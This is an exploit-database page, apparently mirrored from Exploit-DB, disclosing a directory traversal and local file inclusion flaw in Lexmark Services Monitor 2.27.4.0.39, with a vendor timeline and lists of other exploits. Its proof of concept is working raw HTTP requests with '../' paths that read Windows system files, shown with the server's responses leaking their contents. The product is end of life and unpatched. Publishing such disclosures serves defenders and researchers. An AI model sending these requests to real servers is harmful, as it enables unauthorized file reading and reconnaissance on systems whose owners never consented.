Now you can request a feature, improvement or collaborate with us.

"Lexmark Services Monitor 2.27.4.0.39 - Directory Traversal"

Author

Exploit author

"Kevin Randall"

Platform

Exploit platform

hardware

Release date

Exploit published date

2019-11-18

                
                    
                         Download file
                    
                
            
# Exploit Title: Lexmark Services Monitor 2.27.4.0.39 - Directory Traversal
# Google Dork: N/A​
# Date: 2019​-11-15
# Exploit Author: Kevin Randall​
# Vendor Homepage: https://www.lexmark.com/en_us.html​
# Software Link: https://www.lexmark.com/en_us.html​
# Version: 2.27.4.0.39 (Latest Version)​
# Tested on: Windows Server 2012​
# CVE : N/A
​
​
Vulnerability: Lexmark Services Monitor (Version 2.27.4.0.39) Runs on TCP Port 2070. The latest version is vulnerable to a Directory Traversal and Local File Inclusion vulnerability.​
​
Timeline:​
Discovered on: 9/24/2019​
Vendor Notified: 9/24/2019​
Vendor Confirmed Receipt of Vulnerability: 9/24/2019​
Follow up with Vendor: 9/25/2019​
Vendor Sent to Engineers to confirm validity: 9/25/2019 - 9/26/2019​
Vendor Confirmed Vulnerability is Valid: 9/26/2019​
Vendor Said Software is EOL (End of Life). Users should upgrade/migrate all LSM with LRAM. No fix/patch will be made: 9/27/2019​
Vendor Confirmed Signoff to Disclose: 9/27/2019​
Final Email Sent: 9/27/2019​
Public Disclosure: 11/15/2019​
​
PoC:​
​
GET /../../../../../../windows/SysWOW64/PerfStringBackup.ini HTTP/1.1​
TE: deflate,gzip;q=0.3​
Connection: TE, close​
Host: 10.200.15.70:2070​
User-Agent: Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20​
​
HTTP/1.0 200 OK​
Server: rXpress​
Content-Length: 848536​
​
​
.​
.​
.​
.[.P.e.r.f.l.i.b.].​
.​
.B.a.s.e. .I.n.d.e.x.=.1.8.4.7.​
.​
.L.a.s.t. .C.o.u.n.t.e.r.=.3.3.3.4.6.​
.​
.L.a.s.t. .H.e.l.p.=.3.3.3.4.7.​
.​
.​
.​
.[.P.E.R.F._...N.E.T. .C.L.R. .D.a.t.a.].​
.​
.F.i.r.s.t. .C.o.u.n.t.e.r.=.5.0.2.8.​
.​
.F.i.r.s.t. .H.e.l.p.=.5.0.2.9.​
.​
.L.a.s.t. .C.o.u.n.t.e.r.=.5.0.4.0.​
.​
.L.a.s.t. .H.e.l.p.=.5.0.4.1.​
.​
.​
.​
.[.P.E.R.F._...N.E.T. .C.L.R. .N.e.t.w.o.r.k.i.n.g.].​
.​
.F.i.r.s.t. .C.o.u.n.t.e.r.=.4.9.8.6.​
​
​
GET /../../../../../windows/SysWOW64/slmgr/0409/slmgr.ini HTTP/1.1​
TE: deflate,gzip;q=0.3​
Connection: TE, close​
Host: 10.200.15.70:2070​
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.3​
​
HTTP/1.0 200 OK​
Server: rXpress​
Content-Length: 38710​
​
..[.S.t.r.i.n.g.s.].​
.​
.L._.o.p.t.I.n.s.t.a.l.l.P.r.o.d.u.c.t.K.e.y.=.".i.p.k.".​
.​
.L._.o.p.t.I.n.s.t.a.l.l.P.r.o.d.u.c.t.K.e.y.U.s.a.g.e.=.".I.n.s.t.a.l.l. .p.r.o.d.u.c.t. .k.e.y. .(.r.e.p.l.a.c.e.s. .e.x.i.s.t.i.n.g. .k.e.y.).".​
.​
.L._.o.p.t.U.n.i.n.s.t.a.l.l.P.r.o.d.u.c.t.K.e.y.=.".u.p.k.".​
.​
.L._.o.p.t.U.n.i.n.s.t.a.l.l.P.r.o.d.u.c.t.K.e.y.U.s.a.g.e.=.".U.n.i.n.s.t.a.l.l. .p.r.o.d.u.c.t. .k.e.y.".​
.​
.L._.o.p.t.A.c.t.i.v.a.t.e.P.r.o.d.u.c.t.=.".a.t.o.".​
.​
.L._.o.p.t.A.c.t.i.v.a.t.e.P.r.o.d.u.c.t.U.s.a.g.e.=.".A.c.t.i.v.a.t.e. .W.i.n.d.o.w.s.".​
.​
.L._.o.p.t.D.i.s.p.l.a.y.I.n.f.o.r.m.a.t.i.o.n.=.".d.l.i.".​
.​
.L._.o.p.t.D.i.s.p.l.a.y.I.n.f.o.r.m.a.t.i.o.n.U.s.a.g.e.=.".D.i.s.p.l.a.y. .l.i.c.e.n.s.e. .i.n.f.o.r.m.a.t.i.o.n. .(.d.e.f.a.u.l.t.:. .c.u.r.r.e.n.t. .l.i.c.e.n.s.e.).".​
.​
.L._.o.p.t.D.i.s.p.l.a.y.I.n.f.o.r.m.a.t.i.o.n.V.e.r.b.o.s.e.=.".d.l.v.".​
.​
.L._.o.p.t.D.i.s.p.l.a.y.I.n.f.o.r.m.a.t.i.o.n.U.s.a.g.e.V.e.r.b.o.s.e.=.".D.i.s.p.l.a.y. .d.e.t.a.i.l.e.d. .l.i.c.e.n.s.e. .i.n.f.o.r.m.a.t.i.o.n. .(.d.e.f.a.u.l.t.:. .c.u.r.r.e.n.t. .l.i.c.e.n.s.e.).".​
.​
.L._.o.p.t.E.x.p.i.r.a.t.i.o.n.D.a.t.i.m.e.=.".x.p.r.".​
​
​
​
​
GET /../../../../../windows/system32/drivers/etc/services HTTP/1.1​
TE: deflate,gzip;q=0.3​
Connection: TE, close​
Host: 10.200.15.70:2070​
User-Agent: Opera/9.50 (Macintosh; Intel Mac OS X; U; de)​
​
HTTP/1.0 200 OK​
Server: rXpress​
Content-Length: 17463​
​
# Copyright (c) 1993-2004 Microsoft Corp.​
#​
# This file contains port numbers for well-known services defined by IANA​
#​
# Format:​
#​
# <service name>  <port number>/<protocol>  [aliases...]   [#<comment>]​
#​
​
echo                7/tcp​
echo                7/udp​
discard             9/tcp    sink null​
discard             9/udp    sink null​
systat             11/tcp    users                  #Active users​
systat             11/udp    users                  #Active users​
daytime            13/tcp​
daytime            13/udp​
qotd               17/tcp    quote                  #Quote of the day​
qotd               17/udp    quote                  #Quote of the day​
chargen            19/tcp    ttytst source          #Character generator​
chargen            19/udp    ttytst source          #Character generator​
ftp-data           20/tcp                           #FTP, data​
ftp                21/tcp                           #FTP. control​
ssh                22/tcp                           #SSH Remote Login Protocol​
telnet             23/tcp​
smtp               25/tcp    mail                   #Simple Mail Transfer Protocol​
time               37/tcp    timserver

Release Date	Title	Type	Platform	Author
2020-12-02	"Ksix Zigbee Devices - Playback Protection Bypass (PoC)"	remote	multiple	"Alejandro Vazquez Vazquez"
2020-12-02	"ILIAS Learning Management System 4.3 - SSRF"	webapps	multiple	Dot
2020-12-02	"aSc TimeTables 2021.6.2 - Denial of Service (PoC)"	local	windows	"Ismael Nava"
2020-12-02	"Microsoft Windows - Win32k Elevation of Privilege"	local	windows	nu11secur1ty
2020-12-02	"Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality"	webapps	php	"Mufaddal Masalawala"
2020-12-02	"Mitel mitel-cs018 - Call Data Information Disclosure"	remote	linux	"Andrea Intilangelo"
2020-12-02	"ChurchCRM 4.2.0 - CSV/Formula Injection"	webapps	multiple	"Mufaddal Masalawala"
2020-12-02	"ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)"	webapps	multiple	"Mufaddal Masalawala"
2020-12-02	"IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path"	local	windows	"Manuel Alvarez"
2020-12-02	"Pharmacy Store Management System 1.0 - 'id' SQL Injection"	webapps	php	"Aydın Baran Ertemir"

Release Date	Title	Type	Platform	Author
2020-11-30	"ATX MiniCMTS200a Broadband Gateway 2.0 - Credential Disclosure"	webapps	hardware	"Zagros Bingol"
2020-11-30	"Intelbras Router RF 301K 1.1.2 - Authentication Bypass"	webapps	hardware	"Kaio Amaral"
2020-11-27	"Ruckus IoT Controller (Ruckus vRIoT) 1.5.1.0.21 - Remote Code Execution"	webapps	hardware	"Emre SUREN"
2020-11-24	"Seowon 130-SLC router 1.0.11 - 'ipAddr' RCE (Authenticated)"	webapps	hardware	maj0rmil4d
2020-11-23	"TP-Link TL-WA855RE V5_200415 - Device Reset Auth Bypass"	webapps	hardware	malwrforensics
2020-11-19	"Genexis Platinum 4410 Router 2.1 - UPnP Credential Exposure"	remote	hardware	"Nitesh Surana"
2020-11-19	"Fortinet FortiOS 6.0.4 - Unauthenticated SSL VPN User Password Modification"	webapps	hardware	"Ricardo Longatto"
2020-11-16	"Cisco 7937G - DoS/Privilege Escalation"	remote	hardware	"Cody Martin"
2020-11-13	"ASUS TM-AC1900 - Arbitrary Command Execution (Metasploit)"	webapps	hardware	b1ack0wl
2020-11-13	"Citrix ADC NetScaler - Local File Inclusion (Metasploit)"	webapps	hardware	"RAMELLA Sebastien"

Release Date	Title	Type	Platform	Author
2020-03-11	"CoreFTP 2.0 Build 674 MDTM - Directory Traversal (Metasploit)"	remote	windows	"Kevin Randall"
2020-03-11	"CoreFTP 2.0 Build 674 SIZE - Directory Traversal (Metasploit)"	remote	windows	"Kevin Randall"
2019-12-17	"Netgear R6400 - Remote Code Execution"	webapps	hardware	"Kevin Randall"
2019-11-18	"Lexmark Services Monitor 2.27.4.0.39 - Directory Traversal"	webapps	hardware	"Kevin Randall"
2019-06-04	"DVD X Player 5.5 Pro - Local Buffer Overflow (SEH)"	local	windows	"Kevin Randall"
2019-04-30	"Freefloat FTP Server 1.0 - 'STOR' Remote Buffer Overflow"	remote	windows	"Kevin Randall"
2019-04-30	"Freefloat FTP Server 1.0 - 'SIZE' Remote Buffer Overflow"	remote	windows	"Kevin Randall"
2019-03-26	"Titan FTP Server Version 2019 Build 3505 - Directory Traversal / Local File Inclusion"	webapps	windows	"Kevin Randall"
2019-03-13	"Core FTP Server FTP / SFTP Server v2 Build 674 - 'SIZE' Directory Traversal"	dos	windows	"Kevin Randall"
2019-03-13	"Core FTP Server FTP / SFTP Server v2 Build 674 - 'MDTM' Directory Traversal"	dos	windows	"Kevin Randall"
2018-08-30	"DLink DIR-601 - Credential Disclosure"	webapps	hardware	"Kevin Randall"
2018-04-02	"DLink DIR-601 - Admin Password Disclosure"	webapps	hardware	"Kevin Randall"

import requests

response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/47663/?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher	Protocols	Sigalg	Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host	WAF detected

Search for hundreds of thousands of exploits

"Lexmark Services Monitor 2.27.4.0.39 - Directory Traversal"

Download file

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.